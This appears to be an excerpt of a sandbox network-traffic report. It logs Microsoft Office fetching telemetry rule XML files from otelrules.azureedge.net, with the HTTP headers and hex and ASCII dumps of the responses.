                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 626f3694-401e-0015-30d1-450e8d000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010048Z-1746fd949bdjrnwqhC1EWRpg2800000000dg000000004ke5
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    106192.168.2.64981213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:48 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1390
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: d954f12c-201e-000c-55cb-4579c4000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010048Z-1746fd949bd77mkmhC1EWR5efc00000000p000000000nhpn
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    107192.168.2.64981313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:49 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1401
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4f685411-201e-0033-27cc-45b167000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010049Z-1746fd949bd54zxghC1EWRzre400000000tg0000000076sw
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:49 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    108192.168.2.64981413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:50 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1364
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0db49ca6-a01e-001e-68d9-4549ef000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010050Z-1746fd949bd77mkmhC1EWR5efc00000000vg000000000wnw
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    109192.168.2.64981513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:50 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1391
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e8edde3b-801e-0083-79cc-45f0ae000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010050Z-174f7845968n2hr8hC1EWR9cag00000016ag00000000d73b
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    110192.168.2.64981613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:50 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1354
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8dafbd59-c01e-0034-0bce-452af6000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010050Z-174f7845968px8v7hC1EWR08ng00000017100000000056vc
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    111192.168.2.64981713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:50 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:50 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: daf0ea0f-401e-005b-1ad4-459c0c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010050Z-1746fd949bdkw94lhC1EWRxuz400000000r0000000003u1s
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:51 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    112192.168.2.64981813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:51 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:51 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 77d68196-001e-0066-56cc-45561e000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010051Z-1746fd949bdkw94lhC1EWRxuz400000000ng00000000aya9
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    113192.168.2.64981913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:52 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1399
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010052Z-174f7845968ljs8phC1EWRe6en00000016gg00000000g31e
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
